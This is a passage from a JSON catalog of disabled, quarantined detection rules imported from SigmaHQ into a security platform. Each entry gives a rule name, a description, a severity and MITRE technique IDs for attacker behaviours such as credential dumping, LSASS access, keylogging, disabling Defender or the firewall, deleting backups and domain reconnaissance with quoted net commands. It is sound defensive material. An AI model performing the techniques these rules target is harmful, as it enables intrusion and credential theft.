"severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-package-uninstall.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95d61234-7f56-465c-6f2d-b562c6fedbc4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_remove_package.yml" } }, { "id": "sigmahq-sigma-95e60a2b-4705-444b-b7da-ba0ea81a3ee2", "type": "detection", "name": "Remote Access Tool - Simple Help Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-simple-help-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95e60a2b-4705-444b-b7da-ba0ea81a3ee2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml" } }, { "id": "sigmahq-sigma-95eadcb2-92e4-4ed1-9031-92547773a6db", "type": "detection", "name": "Suspicious PowerShell Invocation From Script Engines", "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocation-from-script-engines.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml" } }, { "id": 
"sigmahq-sigma-95f0643a-ed40-467c-806b-aac9542ec5ab", "type": "detection", "name": "Suspicious Get Information for SMB Share", "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-information-for-smb-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95f0643a-ed40-467c-806b-aac9542ec5ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" } }, { "id": "sigmahq-sigma-96036718-71cc-4027-a538-d1587e0006a7", "type": "detection", "name": "Windows Processes Suspicious Parent Directory", "description": "Detect suspicious parent processes of well-known Windows processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-processes-suspicious-parent-directory.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96036718-71cc-4027-a538-d1587e0006a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml" } }, { "id": "sigmahq-sigma-961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "type": "detection", "name": "HackTool - Credential Dumping Tools Named Pipe Created", "description": "Detects well-known credential dumping tools execution via specific named pipe creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-credential-dumping-tools-named-pipe-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml" } }, { "id": "sigmahq-sigma-961e0abb-1b1e-4c84-a453-aafe56ad0d34", "type": "detection", "name": "Execution via stordiag.exe", "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-via-stordiag-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml" } }, { "id": "sigmahq-sigma-961e33d1-4f86-4fcf-80ab-930a708b2f82", "type": "detection", "name": "Potential Persistence Via Excel Add-in - Registry", "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-excel-add-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_xll.yml" } }, { "id": "sigmahq-sigma-962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "type": "detection", "name": "LSASS Access From Non System Account", "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-access-from-non-system-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" } }, { "id": "sigmahq-sigma-9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "type": "detection", "name": "Suspicious File Characteristics Due to Missing Fields", "description": "Detects executables in the Downloads folder that lack FileVersion, Description, Product and Company version-info fields, which is typical of binaries created with py2exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-characteristics-due-to-missing-fields.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" } }, { "id": "sigmahq-sigma-965e2db9-eddb-4cf6-a986-7a967df651e4", "type": "detection", "name": "Potential Keylogger Activity", 
"description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-keylogger-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "965e2db9-eddb-4cf6-a986-7a967df651e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" } }, { "id": "sigmahq-sigma-966315ef-c5e1-4767-ba25-fce9c8de3660", "type": "detection", "name": "Suspicious Environment Variable Has Been Registered", "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Only variables whose value contains suspicious commands or strings are flagged.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-environment-variable-has-been-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "966315ef-c5e1-4767-ba25-fce9c8de3660", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml" } }, { "id": "sigmahq-sigma-968eef52-9cff-4454-8992-1e74b9cbad6c", "type": "detection", "name": "Reconnaissance Activity", "description": "Detects activity such as \"net user administrator /domain\" and \"net group domain admins /domain\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" } }, { "id": "sigmahq-sigma-9691f58d-92c1-4416-8bf3-2edd753ec9cf", "type": "detection", 
"name": "ESXi Admin Permission Assigned To Account Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.012", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-admin-permission-assigned-to-account-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9691f58d-92c1-4416-8bf3-2edd753ec9cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml" } }, { "id": "sigmahq-sigma-969c7590-8c19-4797-8c1b-23155de6e7ac", "type": "detection", "name": "Okta Identity Provider Created", "description": "Detects when a new identity provider is created for Okta.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-identity-provider-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "969c7590-8c19-4797-8c1b-23155de6e7ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/identity/okta/okta_identity_provider_created.yml" } }, { "id": "sigmahq-sigma-96b9f619-aa91-478f-bacb-c3e50f8df575", "type": "detection", "name": "Remote PowerShell Session (PS Module)", "description": "Detects remote PowerShell sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-session-ps-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-96c982fe-3d08-4df4-bed2-eb14e02f21c8", "type": "detection", "name": "Get-ADUser Enumeration Using UserAccountControl Flags", "description": "Detects AS-REP roasting is an attack that is often-overlooked. 
It is not very common, as accounts must be explicitly configured to not require Kerberos pre-authentication (the DONT_REQ_PREAUTH UserAccountControl flag).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/get-aduser-enumeration-using-useraccountcontrol-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" } }, { "id": "sigmahq-sigma-96cd126d-f970-49c4-848a-da3a09f55c55", "type": "detection", "name": "Potential PowerShell Obfuscation Using Alias Cmdlets", "description": "Detects Set-Alias or New-Alias cmdlet usage. 
These cmdlets can be used as a means to obfuscate PowerShell scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-using-alias-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96cd126d-f970-49c4-848a-da3a09f55c55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml" } }, { "id": "sigmahq-sigma-96f697b0-b499-4e5d-9908-a67bec11cdb6", "type": "detection", "name": "Removal of Potential COM Hijacking Registry Keys", "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker, and the deletion could indicate steps to remove their tracks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-potential-com-hijacking-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" } }, { "id": "sigmahq-sigma-970007b7-ce32-49d0-a4a4-fbef016950bd", "type": "detection", "name": "Potential Configuration And Service Reconnaissance Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012", "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-configuration-and-service-reconnaissance-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_query_registry.yml" } }, { "id": "sigmahq-sigma-9703792d-fd9a-456d-a672-ff92efe4806a", "type": "detection", "name": "Backup Catalog Deleted", "description": "Detects backup catalog deletions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/backup-catalog-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9703792d-fd9a-456d-a672-ff92efe4806a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml" } }, { "id": "sigmahq-sigma-9705a6a1-6db6-4a16-a987-15b7151e299b", "type": "detection", "name": "Cisco Discovery", "description": "Find information about network devices that is not stored in config files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1201", "T1057", "T1018", "T1082", "T1016", "T1049", "T1033", "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9705a6a1-6db6-4a16-a987-15b7151e299b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_discovery.yml" } }, { "id": "sigmahq-sigma-970823b7-273b-460a-8afc-3a6811998529", "type": "detection", "name": "Uncommon One Time Only Scheduled Task At 00:00", "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/uncommon-one-time-only-scheduled-task-at-00-00.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "970823b7-273b-460a-8afc-3a6811998529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml" } }, { "id": "sigmahq-sigma-9711de76-5d4f-4c50-a94f-21e4e8f8384d", "type": "detection", "name": "Installation of TeamViewer Desktop", "description": "TeamViewer_Desktop.exe is create during install", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/installation-of-teamviewer-desktop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" } }, { "id": "sigmahq-sigma-9719a8aa-401c-41af-8108-ced7ec9cd75c", "type": "detection", "name": "Windows Defender Definition Files Removed", "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-definition-files-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" } }, { "id": "sigmahq-sigma-973ef012-8f1a-4c40-93b4-7e659a5cd17f", "type": "detection", "name": "Periodic Backup For System Registry Hives Enabled", "description": "Detects the enabling of the \"EnablePeriodicBackup\" registry value. Once enabled, The OS will backup System registry hives on restarts to the \"C:\\Windows\\System32\\config\\RegBack\" folder. 
Windows creates a \"RegIdleBackup\" task to manage subsequent backups.\nRegistry backup was a default behavior on Windows and was disabled as of \"Windows 10, version 1803\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/periodic-backup-for-system-registry-hives-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "973ef012-8f1a-4c40-93b4-7e659a5cd17f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enable_periodic_backup.yml" } }, { "id": "sigmahq-sigma-974515da-6cc5-4c95-ae65-f97f9150ec7f", "type": "detection", "name": "Disable Microsoft Defender Firewall via Registry", "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-microsoft-defender-firewall-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" } }, { "id": "sigmahq-sigma-974be8d2-283e-4033-ab08-7505b84204d0", "type": "detection", "name": "OpenCanary - Host Port Scan (SYN Scan)", "description": "Detects instances where an OpenCanary node has been targeted by a SYN port scan.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-host-port-scan-syn-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "974be8d2-283e-4033-ab08-7505b84204d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_syn_scan.yml" } }, { "id": "sigmahq-sigma-975b2262-9a49-439d-92a6-0709cccdf0b2", "type": "detection", "name": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-appx-installation-attempt-using-add-appxpackage-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"975b2262-9a49-439d-92a6-0709cccdf0b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml" } }, { "id": "sigmahq-sigma-97661d9d-2beb-4630-b423-68985291a8af", "type": "detection", "name": "Potential RCE Exploitation Attempt In NodeJS", "description": "Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rce-exploitation-attempt-in-nodejs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97661d9d-2beb-4630-b423-68985291a8af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/nodejs/nodejs_rce_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-976d6e6f-a04b-4900-9713-0134a353e38b", "type": "detection", "name": "Veeam Backup Servers Credential Dumping Script Execution", "description": "Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
